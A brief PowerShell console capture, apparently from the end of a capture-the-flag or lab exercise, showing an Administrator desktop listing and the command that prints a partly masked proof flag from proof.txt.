Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
-
-
-
-a
- 4/29/2020 9:29 PM 1450 Microsoft Edge.lnk
-a
- 7/17/2025 2:07 AM 34 proof.txt
PS C:\Users\Administrator\Desktop> type proof.txt
76fb8ea14********1c2cbbb